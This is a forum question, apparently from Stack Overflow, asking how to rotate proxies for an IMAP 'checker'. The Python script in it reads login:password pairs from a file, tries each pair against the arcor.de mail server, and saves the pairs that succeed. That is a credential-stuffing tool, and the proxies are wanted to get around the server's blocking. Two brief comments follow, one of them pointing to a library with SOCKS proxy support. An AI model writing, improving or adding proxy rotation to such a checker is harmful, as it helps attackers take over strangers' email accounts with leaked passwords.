# Python IMAPClient proxy

Tags: python, proxy, imap, imapclient

I am writing a simple checker based on `IMAPClient`. In a loop, we go line by line from the file, divide by login \ password, and substitute it into `IMAPClient`. The problem is as expected with the handshake from the server. It is necessary to change the proxy in a cycle, but there is no such option in the `IMAPClient`. Can I change proxies in a loop regardless of this library? If so, how? `OS`? `socket`?

```
file_sval = io.open("...arcor.de", encoding="utf-8")
for i in file_sval:
    stroke = i.split(":")
    login = stroke[0]
    password = stroke[1].replace("\n", "")
    server = IMAPClient('imap.arcor.de', use_uid=True)
    try:
        valid = server.login(login, password)
        print(count," ", i.replace("\n",""), " ", "VALID")
        file_valid = io.open("...valid.de", "a", encoding="utf-8")
        file_valid.write(i)
        file_valid.close()
    except imaplib.IMAP4.error:
        print(count," ", i.replace("\n","")," ", "NO")
    count += 1
```

Comment: Uh, what kind of proxy?  What are you trying to do with io.open?  That just opens files.  Also, the vast majority of imap libraries do not support network proxies because it is not HTTP based, and it’s a very niche need to do so.

Comment: try imap_tools https://github.com/ikvk/imap_tools/blob/master/examples/pysocks_proxy.py